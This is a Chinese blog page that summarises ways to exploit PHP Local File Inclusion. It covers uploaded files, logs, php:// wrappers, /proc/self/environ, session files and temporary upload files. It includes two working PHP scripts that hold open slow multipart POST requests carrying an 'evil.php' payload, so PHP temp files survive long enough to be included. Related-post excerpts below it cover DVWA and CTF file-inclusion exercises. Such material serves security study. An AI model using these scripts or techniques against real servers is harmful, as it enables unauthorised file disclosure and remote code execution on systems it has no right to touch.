php Local File Inclusion的利用方法汇总

最新推荐文章于 2024-11-27 19:00:14 发布
最新推荐文章于 2024-11-27 19:00:14 发布
阅读量785 收藏
点赞数
分类专栏: Security Tech 文章标签: php file wrapper cmd 服务器 session
本文探讨了PHP中多种文件包含的方式,包括上传文件、日志文件、使用phpwrapper及临时文件等,并提供了生成临时文件并使其留存的技术手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

看的国外的一个paper ,总结一下(截断统一不考虑):

1. 包含上传好的文件,jpg、txt、rar等允许的文件。

2. 包含各种日志。

3. 使用php wrapper,例如php://input、php://filter、data://等。

4. 包含 /proc/self/environ ,不熟悉linux,这个就靠大家了。

5. 包含SESSION文件,php保存格式 sess_SESSIONID  默认位置是/tmp/和c:/windows/temp/ 。

6. 包含由php程序生成的文件,缓存、模版等。

7. 包含tmp文件,格式举例:/tmp/phpUs7MxA 和 c:/windows/temp/php3e.tmp(win下可暴力猜解) 。

关于最后一种比较麻烦,也够鸡肋。大家不要想当然,认为tmp和move_uploaded_file()有关,其实没有move_uploaded_file()函数时,php会自动、马上清除tmp文件,而让它保留在服务器的方法是 慢连接 。

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

测试包含temp文件所用两脚本,这个方法唯一好处就是向任意php文件发包,php总会先在服务器上生成tmp文件,然后慢连接使它不被删除:

<?
/* 这个所用时间较少 , 会产生20个临时文件 */
set_time_limit(0);

$cmd = 'Content-Disposition: form-data; name="evil"; filename="evil.php"
Content-Type: zzz

<?phpinfo()?>
--k4shifz_boundary
';
$fs=fsockopen('localhost',80);

/* you can also use HTTP/1.1 */
fputs($fs,'POST /test.php HTTP/1.0
Content-Type: multipart/form-data; boundary=k4shifz_boundary
Host: localhost
Content-Length: 999999

--k4shifz_boundary
'.$cmd);
while($fs)
{
 fputs($fs,$cmd);
 sleep(1);
}
fclose($fs);
exit;
?>

<?
/* 所用时间较长,会产生1个临时文件 */
set_time_limit(0);
$fs=fsockopen('localhost',80);
fputs($fs,'POST /test.php HTTP/1.0
Content-Type: multipart/form-data; boundary=k4shifz_boundary
Host: localhost
Content-Length: 999999

--k4shifz_boundary
Content-Disposition: form-data; name="evil"; filename="evil.php"
Content-Type: zzz

<?phpinfo()?>
--k4shifz_boundary--
');

while($fs)
{
 fputs($fs,'AAAA');
 sleep(1);
}

fclose($fs);
exit;
?>

另外遗憾的说一句,php5.3.4中,null截断已经被修复,%00将告别舞台。


 

http://hi.baidu.com/kashifs/blog/item/7a4bbcff72cea90308244d2b.html

DVWA之PHP文件包含漏洞(File Inclusion
Mi1k7ea
03-08 1万+
文件包含漏洞,简单地说,就是在通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码。更多的介绍这里就不多说了,直接上正题~ 文件包含漏洞的一般特征如下: ?page=a.php ?home=a.html ?file=content 目录遍历(Directory
Web安全 // 文件包含漏洞(File Inclusion
qq_45805420的博客
07-30 857
前言 本题的考察点为 PHP 的 文件包含漏洞(File Inclusion)。      说起来,这是第一次尝试正经的 CTF 比赛,虽然吧一题也没做出来,但总归也是有所收获。路漫漫其修远兮,吾将上下而求索。Go Fight ! ...
Wechall PHP - Local File Inclusion
weixin_44024162的博客
05-14 387
Wechall PHP - Local File Inclusion 本地文件包含(Local File Inclusion) 本地文件包含(LFI)类似于远程文件包含漏洞,但不包括远程文件,只能包括当前服务器上的本地文件(即执行中的文件)。此问题仍可以通过包含包含攻击者控制的数据(如 Web 服务器的访问日志)的文件来导致远程代码执行。 题目 wechall的LFI题 分析 题目要求为显示 …/solution.php 文件 相关代码: GeSHi`ed PHP code $filename =
WeChall_PHP-Local File Inclusion(LFI)
1stPeak's Blog
09-16 590
PHP - Local File Inclusion(LFI) 题目: 中文翻译如下: 核心代码: $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html'; include $filename; 代码详解: 当要 判断一个变量是否已经声明的时候 可以使用 isset 函数 判断表达式是否成立?表...
FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution
cnbird's blog
09-30 1638
Security Advisory FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution Researcher Information Discovered by: Giuseppe `Zmax` Fuggiano Website: http://www.giusef.net Conta
Dvwa漏洞之 local file inclusion 本地文件包含
小雨的博客
04-10 3663
local file inclusion运行攻击者读取同一台服务器上的认可文件 访问www目录外的文件 如果用户账号密码保存在某个文件里,就可以读了,这个是很危险的 如果多个网站部署在一台服务器上,通过a网站的此漏洞,就可以访问B网站的文件,从而进一步实施攻击 ...
ctf web常见题型
最新发布
02-08
本地文件包含(Local File Inclusion) 和远程文件包含(Remote File Inclusion),允许攻击者读取服务器端敏感文件或执行远程命令。 ```php <?php include($_GET['file']); ?> ``` #### 4. 命令注入 当应用程序构建...
php文件包含漏洞 file inclusion vulnerability
whyrookie的博客
09-19 593
0x00 何为文件包含漏洞 开发人员如果在写类似include "a.php"的代码时,如果将a.php写成了可变的值,那么就可以在上面做文章,举个理想的例子: <? include $_GET['a'] ?> 此时可以把url中传入的合法get值篡改成非法值,include进去,这个非法值就被php解释器执行了。 一个更具体的例子: 在访问一个页面时: 此图表明可以传入文件名来形成文件包含效果,如果在此目录建立a.txt并填充内容,则修改page=a.txt就会显示文件内容,此即为...
CTF-rootme 题解之Local File Inclusion - Double encoding
weixin_30478923的博客
03-21 712
LINK:https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding    http://challenge01.root-me.org/web-serveur/ch45/ 本题考察的是本地文件包含漏洞和URL编码,而且是二次编码。 查看链接如下: http://challeng...
【DVWA】File Inclusion
qq_43665434的博客
03-01 275
【DVWA】File Inclusion 一、low级别 1、测试流程 (1)local 发现文件名是通过url传递的 于是尝试更改page参数内容 替换为:..\..\..\..\..\..\..\..\password.txt 如图所示,成功爆出根目录下password.txt文件下的内容,此为本地文件包含。 (2)remote 搭建一个站点,写入一个木马文件 将page参数内容替换为木马文件的url地址 加上参数x,传入cmd命令: http://10.245.3.237/dvwa/vulner
Remote & Local File Inclusion (RFI/LFI)-文件包含漏洞
seanyang_的博客
10-26 613
文件包含攻击,是指攻击者利用文件包含函数的参数引入文件,而Web应用又没有对该参数进行严格的过滤,导致引入文件中的恶意脚本或代码被解析、执行,攻击者获取服务器信息,甚至获取服务器权限。在PHP开发的Web应用中,脚本、图片、文本文档等被文件包含后,都会作为PHP脚本来解析。
DVWA靶场——File Inclusion
sucker的博客
11-27 2016
例如,常见的file://协议用于读取本地文件,而php://协议则是PHP特有的协议,用于访问PHP内部流或执行某些特定操作。:许多服务器会在 PHP 配置中禁用文件包含功能,或者启用了 open_basedir、safe_mode 等安全设置,限制了包含文件的路径和范围,从而减少了攻击者通过 LFI 漏洞访问系统文件的能力。经过前面的测试知道存在文件包含漏洞,那么还可以测试有无远程文件包含,思路就是通过远程文件包含从攻击者搭建的服务器下载恶意的木马文件,以获取该网站的webshell。
LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习
weixin_45116657的博客
02-04 3519
友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html 目录 一、文件包含的基本概念 1、要想成功利用文件包含漏洞,需要满足下面的条件 (1)include()等函数通过动态变量的方式引入需要包含的文件 (2)用户能够控制该动态变量 二、LFI(Local File Include)本地文件包含 1、00字符截断 防御方法: ...
File Inclusion--文件包含漏洞
qq_17762247的博客
05-27 828
一、简介 为了提高代码的复用性,开发人员往往将业务功能封装成模块放入一个文件中,需要的时候包含对应的文件即可。如果包含者为对被包含的文件进行检查,那么很有可能造成灾难性的后果。 File Inclusion分为LFI(Local File Inclusion,本地文件包含)和RFI(Remote File Inclusion,远程文件包含),LFI指使用文件包含函数包含执行本地(Web应用所在主机)文件,利用LFI可以查看系统任意文件内容,如果具备一些条件,也可以执行命令;RFI需要一定的条件,以PHP应用
File Inclusion(文件包含漏洞)
今天的风儿甚是喧嚣
07-10 727
文件包含漏洞总结
网页文件包含漏洞(file inclusion)
热门推荐
正在成为 code ape
03-27 1万+
web php 文件包含漏洞是“代码注入“的一种。代码注入的原理就是注入一段用户能控制的脚本或代码,并让服务端执行 常见的导致文件包含的函数如下: PHP: include(), include_once(), require(),require_once, fopen(), readfile() …. JSP/Servlet: ava.io.File(),java.io.FileReader(...
网络攻击与防御之File Inclusion
薛定谔博客
01-15 427
参考网站: https://www.freebuf.com/articles/web/119150.html LOW 点击file1.php,显示如下 漏洞利用 本地文件包含 构造url http://localhost:8080/DVWA/vulnerabilities/fi/?page=/etc/shadow 报错,显示没有这个文件。 构造url(绝对路径) http://localhos...
文件包含漏洞(File Inclusion Vulnerability)
qq_69100706的博客
04-19 362
这种漏洞的存在是因为开发人员在代码中处理用户输入时,没有对用户可控制的变量进行充分过滤和检查,导致恶意用户可以通过构造特定请求来包含服务器上的任意文件,甚至远程文件。: 更严重的情况下,如果应用程序允许包含来自互联网上的远程文件,攻击者可以尝试注入一个外部URL地址,使得服务器去下载并执行攻击者服务器上的恶意脚本,从而直接植入后门,实施恶意操作。:在编写包含文件的代码时,使用安全函数或者框架提供的安全机制来包含文件,避免直接拼接用户输入。:遵循安全编程规范,定期进行代码审计,及时发现并修复潜在的安全问题。
thinkphp漏洞复现
m0_52920608的博客
11-04 794
thinkphp漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值